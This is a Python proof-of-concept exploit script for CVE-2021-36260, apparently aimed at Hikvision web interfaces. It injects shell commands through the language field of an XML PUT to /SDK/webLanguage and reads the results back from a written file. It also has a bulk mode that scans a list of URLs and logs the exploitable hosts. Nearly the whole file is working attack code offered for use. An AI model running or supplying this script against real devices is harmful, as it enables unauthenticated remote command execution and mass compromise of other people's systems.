CVE-2021-36260.py

# -*- coding: utf-8 -*-

import argparse
import time
import requests
from pyfiglet import Figlet

RED = '\x1b[1;91m'
BLUE = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def check_host(host):
    if not host.startswith("http"):
        print(RED + '[x] ERROR: Host "{}" should start with http or https\n'.format(host) + ENDC)
        return False
    else:
        return True


def check(origin_url):
    url = origin_url.split('//')[1]
    try:
        host = url.split(':')[0]
        port = url.split(':')[1]
    except:
        port = 80
    headers = {
        "host": f'{host}:{port}',
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        'Accept': '*/*',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8'
    }
    data = '<?xml version="1.0" encoding="UTF-8"?>' \
           f'<language>$(>webLib/cu)</language>'
    try:
        resp1 = requests.put(url=origin_url + '/SDK/webLanguage', headers=headers, data=data, timeout=3, verify=False)
        resp2 = requests.get(origin_url + '/cu')
        if resp2.status_code == 200:
            print(GREEN + f'[!] {url} is verified exploitable\n')
            return True
        else:
            print(BLUE + f'[+] Remote is not vulnerable (Code: {resp2.status_code})\n')
            return False
    except:
        print(RED + f'[-]Cannot connect to ' + url + '\n')


def cmd(origin_url, cmd):
    url = origin_url.split('//')[1]
    host = url.split(':')[0]
    port = url.split(':')[1]
    headers = {
        "host": f'{host}:{port}',
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
        'Accept': '*/*',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8'
    }
    data = '<?xml version="1.0" encoding="UTF-8"?>' \
           f'<language>$({cmd}>webLib/cu)</language>'
    try:
        resp1 = requests.put(url=origin_url + '/SDK/webLanguage', headers=headers, data=data, timeout=3, verify=False)
        resp2 = requests.get(origin_url + '/cu')
        if resp2 is None or resp2.status_code != 200:
            print(RED + f'[!] Error execute cmd "{cmd}"\n')
        else:
            print(resp2.text)
    except:
        print(RED + f'[-]Cannot connect to ' + url + '\n')


def main():
    f = Figlet(width=2000)
    print(f.renderText("Cuerz"))

    parser = argparse.ArgumentParser(description='CVE-2021-36260')
    print('Example: CVE-2021-36260.py -u http://192.168.1.1:8080 --check')

    parser.add_argument("-u", "--url", help='Start scanning url')
    parser.add_argument("-f", "--file", help='read the url from the file')
    parser.add_argument("--check", required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    args = parser.parse_args()

    if args.url and check_host(args.url):
        if args.check:
            check(args.url)
        elif args.cmd:
            cmd(args.url, args.cmd)

    elif args.file:
        f = open(args.file, "r")
        all = f.readlines()
        for i in all:
            url = i.strip()
            if check_host(url):
                if check(url):
                    with open('Exist.txt', 'a+') as fp:
                        fp.write(url + '\n')
            time.sleep(0.2)


if __name__ == '__main__':
    main()